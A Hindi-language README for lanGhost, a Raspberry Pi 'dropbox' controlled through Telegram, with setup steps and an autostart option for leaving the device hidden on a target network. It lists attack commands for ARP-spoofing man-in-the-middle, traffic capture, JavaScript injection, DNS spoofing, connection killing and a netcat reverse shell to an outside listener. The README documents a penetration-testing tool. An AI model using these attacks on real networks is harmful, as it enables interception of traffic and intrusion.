
👻 एक LAN ड्रॉपबॉक्स चैटबॉट जो टेलीग्राम के माध्यम से नियंत्रित किया जा सकता है
lanGhost को Raspberry Pis (Raspbian/Kali for RPi) के लिए डिज़ाइन किया गया है। इसे अन्य/डेस्कटॉप डिस्ट्रोस पर चलाने से समस्याएँ उत्पन्न हो सकती हैं और संभवतः अपेक्षा के अनुसार कार्य नहीं करेगा।
आपको एक Raspberry Pi की आवश्यकता होगी जिसमें SD कार्ड पर ताजा Raspbian/Kali हो, क्योंकि आप बैकग्राउंड में कुछ और नहीं चलाना चाहते हैं।
Pi को बूट करें, SSH शेल प्राप्त करें या एक मॉनिटर और कीबोर्ड कनेक्ट करें और ये आदेश दर्ज करें:
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py
कृपया सेटअप स्क्रिप्ट चलाने के दौरान प्रश्नों/संदेशों को पढ़ें!
[+] कृपया नेटवर्क इंटरफ़ेस का नाम दर्ज करें जो लक्ष्य LAN से जुड़ा है/जुड़ेगा। डिफ़ॉल्ट वायर्ड इंटरफ़ेस 'eth0' है, और अधिकांश सिस्टम पर डिफ़ॉल्ट वायरलेस इंटरफ़ेस 'wlan0' है, लेकिन आप इसे किसी अन्य टर्मिनल में 'ifconfig' कमांड से जाँच सकते हैं।
[+] कृपया Telegram पर @BotFather को '/newbot' कमांड भेजकर एक Telegram API कुंजी बनाएं।
इसके बाद, @BotFather आपसे आपके बॉट के लिए एक नाम चुनने के लिए कहेगा। यह आप जो चाहें वह हो सकता है।
अंत में, @BotFather आपसे आपके बॉट के लिए एक यूज़रनेम मांगेगा। आपको यहाँ एक अद्वितीय यूज़रनेम चुनना होगा जो 'bot' पर समाप्त होता है। उदाहरण के लिए: xdavidbot। इस यूज़रनेम को नोट कर लें, क्योंकि बाद में आपको अपने बॉट को खोजने के लिए इसे ढूँढना होगा, जिस पर lanGhost चलेगा।
जब आप @BotFather को अपना चुना हुआ यूज़रनेम भेज देंगे, तो आपको अपनी API कुंजी प्राप्त होगी।
[+] अब lanGhost को केवल आप तक पहुँच की अनुमति देने के लिए, आपको स्वयं को सत्यापित करने की आवश्यकता है।
नीचे दिए गए सत्यापन कोड को उस बॉट को भेजें जिसे आपने अभी बनाया है। इसे खोजने के लिए बस अपने बॉट के @username (जो आपने @BotFather को भेजा था) को खोजें।
[+] भेजने के लिए सत्यापन कोड: ******
[+] क्या आप चाहते हैं कि lanGhost बूट पर प्रारंभ हो? यह विकल्प आवश्यक है यदि आप इस उपकरण का उपयोग ड्रॉपबॉक्स के रूप में कर रहे हैं, क्योंकि जब आप इस उपकरण को किसी नेटवर्क में छोड़ने वाले हैं, तो आपके पास lanGhost को दूरस्थ रूप से प्रारंभ करने का मौका नहीं होगा! (ऑटोस्टार्ट एक नई क्रॉन '@reboot' प्रविष्टि जोड़कर काम करता है)
lanGhost का /24 से बड़े नेटवर्क पर उपयोग अनुशंसित नहीं है क्योंकि स्कैन में बहुत समय लगेगा।
lanGhost शांत नहीं है। ट्रैफ़िक की निगरानी करने वाला कोई भी व्यक्ति ARP पैकेट देख सकता है!
यदि आपने चरण 4/4 (ऑटोस्टार्ट) पर हां चुना है, तो Pi ड्रॉप करने के लिए पूरी तरह से तैयार है। lanGhost बूट पर शुरू होना चाहिए, और आपको Telegram पर lanGhost started! 👻 पाठ के साथ एक संदेश भेजेगा।
पहले अपनी प्रयोगशाला में इसका परीक्षण करना सुनिश्चित करें और जाँचें कि lanGhost आपके संदेशों का जवाब दे रहा है या नहीं!
यदि आप सब तैयार हैं, तो बस Ethernet केबल को Pi में प्लग करके और micro USB के माध्यम से बिजली कनेक्ट करके इसे लक्ष्य नेटवर्क से कनेक्ट करें और आप जाने के लिए तैयार हैं!
(lanGhost WiFi पर भी काम कर सकता है, लेकिन पहले स्वचालित रूप से नेटवर्क से कनेक्ट करने के लिए आपको wpa_supplicant सेट अप करना होगा)
/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.
आप इनमें से किसी एक कमांड का उपयोग करके हमला शुरू कर सकते हैं: /kill, /mitm, /replaceimg, /injectjs, /spoofdns
जब आपके पास एक या अधिक हमले चल रहे हों, तो आप उनकी सूची प्राप्त करने के लिए /attack कमांड का उपयोग कर सकते हैं जिसमें ATTACK-ID होंगे।
हमले को रोकने के लिए /stop [ATTACK-ID] टाइप करें।
/reversesh केवल एक netcat TCP कनेक्शन बनाता है जो एन्क्रिप्टेड नहीं है और सभी ट्रैफ़िक की निगरानी की जा सकती है! इसका उपयोग केवल आपातकालीन सुधारों के लिए या यदि आवश्यक हो तो एन्क्रिप्टेड रिवर्स कनेक्शन सेट करने के लिए करें।
/reversesh कमांड Pi पर रिवर्स शेल प्राप्त करने के लिए है, जब यह बाहर से पहुँच योग्य न हो।
/reversesh कमांड का उपयोग करने के लिए आपके पास एक सर्वर होना चाहिए जो शेल के लिए सुन रहा हो।
Netcat command to start up the listener on your server:
$ nc -l 0.0.0.0 [PORT]
Telegram command:
/reversesh [IP-of-your-listening-server] [PORT]
/kill - लक्ष्य के लिए इंटरनेट कनेक्टिविटी को रोकता है।/mitm - लक्ष्य से HTTP और DNS ट्रैफ़िक कैप्चर करता है और उसे टेक्स्ट संदेशों में भेजता है।/replaceimg - लक्ष्य के लिए HTTP इमेज को उस चित्र से बदल देता है जो आप बॉट को भेजते हैं।/injectjs - लक्ष्य के लिए प्रत्येक HTTP HTML प्रतिक्रिया में JavaScript इंजेक्ट करता है। आपको JS फ़ाइल को अपने सर्वर पर होस्ट करना होगा और URL को पैरामीटर के रूप में देना होगा।/spoofdns - लक्ष्य के लिए DNS प्रतिक्रियाओं को स्पूफ करता है।सभी हमले ARP स्पूफिंग का उपयोग करते हैं!
/scan - स्थानीय नेटवर्क को स्कैन करता है और ऑनलाइन होस्ट्स को लौटाता है। होस्ट्स खोजने के लिए nmap -sn स्कैन का उपयोग करता है।/scanip - एक IP पते को खुले पोर्ट और अन्य जानकारी के लिए स्कैन करता है। nmap -sS स्कैन का उपयोग करता है।जब भी कोई नया उपकरण नेटवर्क से जुड़ता/छोड़ता है, तो आपको एक संदेश मिलेगा।
Copyright (c) 2018 by David Schütz. Some rights reserved.
lanGhost MIT लाइसेंस की शर्तों के अंतर्गत है, लाइसेंस फ़ाइल में बताई गई सभी स्पष्टीकरणों का पालन करते हुए। आप मुझे xdavid{at}protonmail{dot}com पर ईमेल भी कर सकते हैं।